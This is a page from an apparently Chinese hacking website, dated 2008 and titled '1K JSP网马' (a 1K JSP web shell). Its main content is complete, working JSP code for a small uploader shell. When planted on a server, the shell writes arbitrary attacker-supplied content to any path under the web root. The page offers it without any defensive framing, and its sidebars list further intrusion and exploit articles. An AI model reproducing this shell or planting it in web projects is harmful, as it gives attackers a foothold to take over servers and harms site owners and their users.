黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑软介绍 >> 正文
·没有路由密码权限时的鸽08-23·1K JSP网马11-02
·LOG备份与备份差异的对比11-02·通过Mysql入侵服务器11-02
·手工打造更强大的Window11-02·我的网络电脑,网络免费11-02
·著名的智能化免费DNS解析11-02·HastyFree提供1G免费php11-02
·利用“dbo”获得SQL管理10-31·入侵渗透梁静茹官方网站10-31
·妙用QQ安全链接中心10-31·PHP168整站系统0DAY10-31
·ASPXshell MS08-067插件10-31·SA执行命令方法总结10-31
·神奇XT 让Windows图片查10-31·Vista系统EFS加密功能的10-31
·Windows 2008下应对驱动10-30·用U盘共享Windows vista10-29
·占用0%资源 HOST文件打造10-29·延长硬盘寿命!深入了解10-29
·响应MS08-067 Windows系10-29·一种防注入代码的绕过学10-28
·Ms08-067 Exp 详细测试流10-28·织梦(Dedecms)任意代码执10-28
·社工+提权艰难入侵某通信10-28·艰难入侵源码站并提权10-28
·MSN,QQ,网页总掉线该怎么10-27·入侵的10个小技巧10-27
[推荐]1K JSP网马
        ★★★★

1K JSP网马

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-11-2 11:06:16

以下是引用片段:
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<html>
<head>
  <title>小马</title>
<meta http-equiv="keywords" content="小马">
<meta http-equiv="description" content="小马">
</head>
<%
int i=0;
  String method=request.getParameter("act");
  if(method!=null&&method.equals("up")){
  String url=request.getParameter("url");
  String text=request.getParameter("text");
  File f=new File(url);
  if(f.exists()){
    f.delete();
  }
  try{
    OutputStream o=new FileOutputStream(f);
    o.write(text.getBytes());
    o.close();
  }catch(Exception e){
    i++;
    %>
    上传不成功
    <%
    }
    }
    if(i==0){
    %>
    上传成功
  <%
  }
%>

<body>
<form action=’?act=up’ method=’post’>
<input size="100" value="<%=application.getRealPath("/") %>" name="url"><br>
<textarea rows="20" cols="80" name="text">这写马的代码</textarea><br>
<input type="submit" value="up" name="text"/>
</form>
</body>
</html> 

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
    • 【字体:
    中介交易区
    最 新 热 门
    强悍挂马工具:IIS_AD IIS扩展(附05-04
    Real Player rmoc3260.dll Activ04-04
    Real Player rmoc3260.dll Activ04-03
    Pangolin号称很牛的注入工具03-25
    仿FirePack网马管理系统fsploit03-01
    机器狗生成器02-26
    Serv-U 6.X 提权脚本01-31
    入侵工具Knark的分析及防范01-14
    如何使用Nikto漏洞扫描工具检测网12-21
    十三WEBSHELL终结版后门的去除过12-14
    hijack(红狼安全小组原创作品 - 11-29
    高级内网渗透工具:Paris (创建VP11-01
    相 关 文 章
    对某ASC加密网马的破解和利用
    FLASH网马现身互联网
    网马的运行分析续篇
    IE的0DAY网马
    网马的运行分析
    Real Player rmoc3260.dll ActiveX Con
    仿FirePack网马管理系统fsploit
    REAL网马地址解密转换器
    2007年度网马漏洞不完全总结
    借"3168a网马"案例来分析所谓的自写函数
    分析ANI智能网马挂马
    JSP网站中Resin漏洞
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886